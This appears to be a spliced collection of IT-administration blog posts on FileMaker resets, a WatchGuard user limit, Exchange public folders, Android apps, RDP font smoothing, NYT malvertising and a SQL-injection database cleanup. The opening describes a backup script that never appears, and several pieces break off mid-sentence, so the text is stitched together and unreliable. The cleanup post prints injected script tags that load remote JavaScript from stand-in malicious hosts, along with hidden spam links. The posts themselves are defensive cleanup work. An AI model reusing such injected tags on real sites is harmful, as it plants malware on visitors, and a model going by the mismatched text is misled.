Author: Jeff Trumbull

Description:
Backup files that make a Microsoft virtual server with only about 1 minute of down time. Suspends the virtual server, takes a shadow copy , starts the virtual server then copies virtual server files. This could be used to copy any open files. Requires vshadow.exe from vss sdk.

Script:

However, it's not as bad as it seems - there's not so much to configure that it should be too big of a hassle.

If you have console access, close your databases, and make note of your settings.

• Stop the Filemaker Service.
• Assuming a default installation, go to c:\program files\filemaker\filemaker server\admin\conf and delete the 4 XML files in there.
• Restart the Filemaker Service
• Reconnect to the Filemaker Console

It'll re-walk you thru the wizard to set up the server, and the first thing you do is set up a username and password. Your databases (again, assuming a default installation) will already be there, ready to go...

The client has a standard Linksys WRT54G which is sitting behind a WatchGuard SOHO router.  (The WatchGuard predated my involvement with the client, and we determined it was easier to use the WRT54G as an access point rather than ripping out the WatchGuard...)

Upon inspection, the laptop WAS connecting to the wireless network, it just didn't have internet access.  Vista would show it had Internet connectivity, but it would then just go away.

Upgraded the WRT54g's firmware, same result.  Changed from WEP to WPA-2. Same result.

Reviewed the logs on the WatchGuard and saw "User count exceeded. Packet dropped."

A-HA!

The WatchGuard, unlike most consumer routers, has a user limit to it.  It keeps track of 10 IPs and when IP number 11 hits the routing table, it gets whacked with a big ole' DENY rule.

When I plugged the laptop into the WRT54g via ethernet cable, the IP address was one of the 10 in the routing table and packets were allowed to flow.  The IP address assigned to the wireless interface was not in the table and therefore blocked.

We couldn't figure out why the laptop stopped working.  The client mentioned the laptop stopped working when we put a new computer on the floor.  We did a quick count of all devices on the network and only came up with 7...

Just as I was leaving, one of the warehouse guys came in holding his iPhone asking "Did something happen to the wireless network?"

Of course, something had -- I hadn't changed the Linksys back to WEP after the WPA-2 experiment, and he lost his connection... and the mystery of the additional devices was solved.

So, the moral is two-fold -- look for user licensing restrictions where you least expect them, and someone else's handheld device from home sitting on your network might have a negative impact on your ability to get work done.

This might have been true in Y2K, but in 2010, we're not so gross.

If you use ESVA like we do, there's a simple enough fix which is outlined in the ESVA Forums.

Otherwise, you'll need to fix your local.cf rules or edit the 72_active.cf file.

Further details can be found at Mike Cardwell's blog: SpamAssassin 2010 bug.

We weren't able to see how the site was attacked, nor did we worry about how the site would be steeled against future occurrence (always use stored procedures and/or parametrized queries, kids!) -- this was purely a cleanup job.

This is the code we had:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],'''', '''')') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99 OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),'''','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings -- mostly it only stripped out a single bit of invasive code, and our new friend had quite a bit of code to deal with, so instead of the almost quaint looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

We had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden -- an accomplished ColdFusion developer -- suggests "why don't we just drop everything to the right of the <script> tag?"

Sounded like a great idea and worked very well. Since his infection had only affected NTEXT fields, we focused on cleaning them up, as well as making the script as easy to manage as possible. So I rewrote it to make it more friendly to the end-user,

DECLARE @T VARCHAR(255),@C VARCHAR(255), @sql varchar(2000)
DECLARE @ObjectionableText varchar(1000)
Set @ObjectionableText = '<script type=''''text/javascript'''' src=''''http://google-anally' -- make sure your single quotes are escaped with another single quote
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
set @sql = ('UPDATE ['+@T+'] SET ['+@C+']= left(cast(' +@C+ ' as varchar(8000)), charindex('''+@ObjectionableText+''', cast(' +@C+ ' as varchar(8000)))-1) where '+@C+ ' like ''%'+@ObjectionableText+'%''')
print @sql
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

So, let's take this apart real quick...

We declare some variables:

DECLARE @T VARCHAR(255),@C VARCHAR(255), @sql varchar(2000)
DECLARE @ObjectionableText varchar(1000)

Now, this next line is the important one -- this is where we tell the script where we want to kill from. In our example above, we could have used <script as a starting tag, but the client was afraid some of the data might have legitimate <script> tags in the data, so we needed to get a little more specific; this string appeared in the data: "<script type='text/javascript' src='http://google-anally..." so we decided to use that. However, you might notice that there were SINGLE QUOTES in the string. Since SQL Server uses a single quote as a string delimiter, we need to make sure we use FOUR single quotes in the next line everytime there's a single quote:

Set @ObjectionableText = '<script type=''''text/javascript'''' src=''''http://google-anally' -- make sure your single quotes are escaped with another single quote

We use FOUR single quotes because this script will generate a binch of UPDATE statements for you, and the UPDATE statements need to have THEIR single-quotes escaped, so we need to tell our variable to output TWO single quotes, which means using FOUR single quotes in the variable. (Our escape uses 2 quotes and the escape later uses 2 quotes, so that equals 4.)

(Don't follow? Doesn't matter. Trust me. In your ObjectionableText, use FOUR single quotes where you see ONE.)

Now, like the old code, we set the cursor up as before; and since we only need NTEXT fields, we're only looking for columns where xtype = 99:

DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN

But now, we have to change the SQL statement we want to use to (a) keep 8k worth of ntext -- if you think you have more than 8K, change the number accordingly in SQL2005+, SQL2000 has an varchar limit of 8K for a varchar field... so we UPDATE the field to a new value, computed by doing a simple LEFT and using the CHARINDEX of the text we shoved in the @ObjectionableText variable (minus 1) to come up with it. To make sure we don't pass an invalid value to CHARINDEX we need to make sure the rows we're working on actually have the polluted text -- and that's where the LIKE at the end comes in.

set @sql = ('UPDATE ['+@T+'] SET ['+@C+']= left(cast(' +@C+ ' as varchar(8000)), charindex('''+@ObjectionableText+''', cast(' +@C+ ' as varchar(8000)))-1) where '+@C+ ' like''%'+@ObjectionableText+'%''')

NOTE: Bear in mind we're doing a TABLE SCAN on this table since we're doing a mid-string lookup, so performance may be bad. It beats going thru everything by hand, but if you have a large table (10,000+ rows) it might take some time.

Now, I print the SQL statement. I could execute the statement (EXEC @sql) instead, but since I don't want you cutting-and-pasting this code without knowing what it has the potential to do, I will go for the more benign PRINT and let you either change it to EXEC or cut and paste the resulting SQL statements into a new Query Analyzer/Management Studio window..

print @sql

And then we loop thru the rest of the cursor and cleanup after ourselves:

FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

That's it. Copy and paste the above code into Query Analyzer or SQL Server Management Studio and run it; you'll get a list of SQL statements back which look like this:

UPDATE [Banners] SET [AdCode]= left(cast(AdCode as varchar(8000)), charindex('<script type=''text/javascript'' src=''http://google-anally', cast(AdCode as varchar(8000)))-1) where AdCode like '%<script type=''text/javascript'' src=''http://google-anally%'
UPDATE [Banners] SET [AdCodeNetscape]= left(cast(AdCodeNetscape as varchar(8000)), charindex('<script type=''text/javascript'' src=''http://google-anally', cast(AdCodeNetscape as varchar(8000)))-1) where AdCodeNetscape like '%<script type=''text/javascript'' src=''http://google-anally%'

Paste them into a new QA/SSMS window and run them, and your data should then be clean.

REMINDER! In this case, we assume the malicious code was merely appended to the end of the NTEXT fields, not that fields were truncated and appended to like in the last article. If that's the case, data loss may still be possible in that the injection attack might have caused data fields to be truncated.

Thanks to Branden for trusting us with his data, and if you're in the market for

Exchange 2003 allowed us to easily mail enable public folders, so something sent to info@domain.invalid would go to a public folder where any number of staff could monitor the mailbox.

However, by default, the mail is stored in the Public Folder as a NOTE and not an E-MAIL (for the geeks in the audience IPM.POST vs. IPM.NOTE)

To make the public folder store incoming mail as emails, we need to make a quick registry change. This is all outlined in MS KB 817809.

Go to

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSExchangeIS\<ServerName>\Public-<GUID>

And create (or edit) the key:

Value name: Incoming defaults to IPM.Note
Value type: DWORD
Value data: 1

Setting the value to 1 (true) stores things as IPM.NOTE (which is what we want). Setting the value to 0 sets it back to saving things as a post.

Alarmed Light - Used it because it has a feature where you're forced to answer math questions to turn the alarm off. Kinda forces you to shake the cobwebs out and get started.

Aloqa - Cool app that uses your GPS to let you know what's around. It's integrated with Yelp for food ratings. It has icons on its main screen for "Hot" (whatever that means), Yelp Restaurants, Coffee, last.fm, Music (showing me concerts in Denmark?!?), Playing Tonight (movies), Yelp Bars & Clubs, Real Estate, Wikipedia, ATMs, Pizza, Aloqa, Yelp Fast Food and then "Add more channels." It more or less does what it is supposed to; it's nice to look at.

BeamReader - a PDF viewer. I should uninstall since I bought "Documents to Go"

Bubble Burst Lite -- Windows Mobile Jawbreaker for the Droid.

ConnectFour - decent enough implementation. AI seems a little stupid sometimes.

Documents to Go - open Word, Excel, Powerpoint, PDF. Does good job at rendering PDFs.

Flashlight - turns your screen white. Doesn't seem to adjust for maximum brightness. Passable.

Flickr Droid - Droid needs a good Flickr app. This isn't it, but the best one I could find that uses the Flickr API to let me at my stuff, since a lot of my photostream is friends/family only.

FlightStats Lite - haven't had a chance to play with this. Will in January as I head to CES.

Goggles - Google's latest toy. Varies from wildly successful to "how did you not recognize the Pepsi logo?!?"

GPS Status - essentially a digital compass. Used when I was troubleshooting GPS on the phone.

Flixter Movies - quick and easy to get to where we have to go for Friday Morning Movie Club.

NYC Bus and Subway Map - not as interactive as I'd like. Literally a HiDef graphic of the map, and you can click thru to the MTA website for further details on the lines.

OpenTable - online restaurant reservations from opentable.com . Decent.

Pandora - works well over 3G, tho I imagine it eats thru the quota pretty quick.

PicSay Lite - dopey photo editing thing. Makes speech baloons. Don't know why I downloaded this.

Poke a Mole - whack-a-mole for the phone. Fun game with a Giant Downside - even when phone is muted annoying background music plays. Have to go into game menu to mute it.

Remote RDP Demo - eventually I'll need to really use function keys when I Remote Desktop into a machine from my phone, but until then, the demo version does the trick.

Robo Defense FREE - I do enjoy the tower defense genre of casual gaming... so why not have it on my phone? (Hardly never play it. Seemed like a good idea.)

Shazam - this app still amazes me. Where did they get that song database???

Stopwatch - straightforward.

Sudoku Free - seeing it in my list makes me feel smart until I play it, thenI feel dumb.

The Weather Channel - it has a widget so I can glance at the home screen to see what it's going to be like... or rather I can look at the home screen and tell my wife what it's going to be like... (I had a weather widget on the Treo and missed it.)

TivoRemote - control the Tivo over WiFi. Nice, especially for text entry. The iPhone's version is better.

TRAFFIC! - A test app for me. Not in love.

Trap! - Another game, but its "draw a line" technology gets in the way of gameplay. Fun when it does what you want.

Tunes Remote - Control iTunes from the Droid. YAY! One of the big reasons I got the iPhone touch was to control the iTunes machine hooked to the outdoor speakers.

Twidroid Pro - From what I understand, the best Twitter client for the Droid. I'm happy with it. Does everything I need, but I am far from a Twitter power user, so some might find it lacking. They constantly update it which seems like they're interested developers.

US Traffic - Another traffic app that I tried before I realized Google Maps had a Traffic layer...

wpToGo - Allows me to post to WordPress from the phone... tho I have not had the need to do so.

What have I missed?

Happily, Dell has a set of the drivers available.

Sadly, they're part of a floppy image.

Grrr!

Enter Virtual Floppy Drive 2.1, a cool piece of shareware that can be glommed from http://chitchat.at.infoseek.co.jp/vmware/vfd.html

This operates along the same line as Microsoft's Virtual CD-ROM Control Panel for Windows XP, which mounts an ISO image and has it appear as a drive letter.

VFD does the same thing, it mounts an image file (or just creates a small chunk of RAM and treats it like a blank floppy) and you assign it a drive letter.

I loaded the application up -- it's pretty self-explanatory -- assigned to Drive B: and then launched Dell's Floppy making utility, told it to write to Drive B and bingo! I had my extracted files.

From there, it was trivial to copy them to the appropriate install media and we were off to the races.

(I finally searched for a virtual solution, when the one floppy disk I could find was throwing errors. How happy are we that those things have (mostly) gone the way of the dinosaur?)

Oh, a KB article sheds some light:

The option to enable theFont smoothing feature is not available in the version of RDC that was released with Windows Server 2003. By default, Windows Server 2003 disables theFont smoothing feature in all remote connections. These connections include the connections that are established through RDC 6.0.

Happily, MS's dictatorship is matched only by its benevolence, because there's a "hotfix" available for this problem:

KB946633:The "Font smoothing" feature has no effect in Windows Server 2003 terminal sessions

It kinda cracks me up...

"We'll put the feature in."

"But it doesn't work. We should disable the checkboxes"

"Why would we do that?"

I bring this up because we just migrated a client over to a terminal server environment, and the number one complaint was "My fonts aren't fuzzy!"

Since I actually prefer the crispness of an LCD display, I didn't really notice, or care, but since I wasn't signing the check, I did my best to comply. I used bing to google the issue, and found the hotfix.

Of course, since it's a hotfix, it requires a reboot... so here I am at 5:30 AM, having just rebooted the server.

This hotfix is available via draconian download -- you fill out a form, they send an email with the link - however, they put the link in parentheses, so Outlook botches the conversion and breaks the link, resulting in the need for you to copy and paste the URL into your browser. From there, it's a Start > Next > Finish install and a reboot seals the deal.

As a side note: ClearType increases the bandwidth requirements, and is only available if you're running in "High Bandwidth" mode in the RDP 6.0 (or better) client. It also needs to be turned on in the desktop session.

In the RDP client:

Click Options > Experience tab

The check off the "font smoothing" box.

On the Windows 2003 Desktop:

Right click on the desktop > Properties >Appearance tab > Effects button

That should do it!

This is true, they were. My MIL said she was trying to read Maureen Dowd and got hit with a rogue anti-spyware application. I was able to CoPilot in and clean things up. (There didn't seem much to clean up, I killed a running process of IE (she uses Chrome) and the scare-screen went away.

I sparked up an unpatchedWinXP Virtual Machine running IE6 and went to the NYT website, and was prompted immediately to install flash. I opted not to and surfed around the site, fighting the information bar's insistence that I install an ActiveX Control.

So, I gave in and voila!

So, no matter how you answer, you're already stung.

Of course, your instinct is to click "Cancel" and you do, and then you're scared out of your wits when confronted with this page from protection-check07.com (don't go there!) and proceeds to make you think you're infected.

But, if we take a second to look at the scare box, we see something is amiss...

We don't have an E: drive ... and the optical drive we have is a CD-Rom, not a DVD-RAM drive...

The page that pops up is meant to scare you. The infections it reports are false -- the only infection you have (at the moment) is the webpage. If you go into taskmanager and find iexplorer.exe (or firefox.exe if you use Mozilla Firefox) and right-click on it and choose "End Process" that should make the pop-up go away.

If you click ANYWHERE on the page, it will prompt you to download a program:

Seems reasonable -- you got a warning you were infected, and you want to download a file called "Scanner-75f_2015.exe" seems legit.

IT'S NOT.

(But you knew that by now, right?)

However, this is a clear indication of how a fully patched system gets compromised. Some buys ad space on a major website. They probably serve a lot of legit ads, but in a few instances, they serve illegitmate ads. In this case, they seem to be using Flash as an attack vector. Flash movie loads and redirects your browser to a rogue site, and they're off to the races.

Since I'm a professional, I downloaded the file -- I didn't run it -- and I submitted it to http://virscan.org an online file scanner which tests a file against 37 of the leading anti-virus vendors.

Somewhat sadly, only 5 out of 37 scanners picked this up as malware:

I also ran the file thru VirusTotal.com which tests against 41 scanners, and 7 scanners turned up a positive on our file:

You can see the full report over on VirusTotal's site: http://www.virustotal.com/analisis/7bda9187e26b5a185501874b201731f12e3604c078408500abda83c35ef2fbe1-1252857630

The one thing that surprised me on the results was Microsoft's detection, trumping McAfee, Symantec, AVG and Clam-AV among many others. I've never considered MS a true player in the anti-malware landscape, but perhaps I will re-evaluate.

Kaspersky, and most othersecurity vendors, offers an online scan of your system (requires Java). If you don't have an anti-virus product installed -- or even if you do -- you might want to visit a different security vendor site than the one you have to do a check. Belt and suspenders and all that.

(This piece of spyware also eluded my trustyMalwarebytes Anti-Malware (www.malwarebytes.org) which should reinforce that no one piece of software can provide 100% protection.

There is no strong defense for this, as nothing you overtly do can cause it. Make sure your anti-virus is up to date, do regular scans of your computer -- but MOST importantly --keep backups.

As for the clients, one of them uses Norton GoBACK (since superceded in the marketplace by Ghost 14) , so they restored their machine back an hour before the infection occurred, went back to the NY Times site, got re-infected, restored AGAIN using GoBack, and then stayed away from the NY Times site. And my Mother-in-Law has been trained well and as soon as the box popped up, she called me and I was able to CoPilot into her machine and close IE before it did any damage... may you all be as lucky.

Further Info:

http://ask.metafilter.com/132707/nytimes-spyware

http://discussions.apple.com/thread.jspa?messageID=10197120&tstart=0

http://forums.mozillazine.org/viewtopic.php?f=38&t=1481195

[UPDATE: 1:30 PM, Sunday Sept 13 - the NY Times site seems to have stopped serving the ad. Further attempts to get infected have proven unsuccessful.]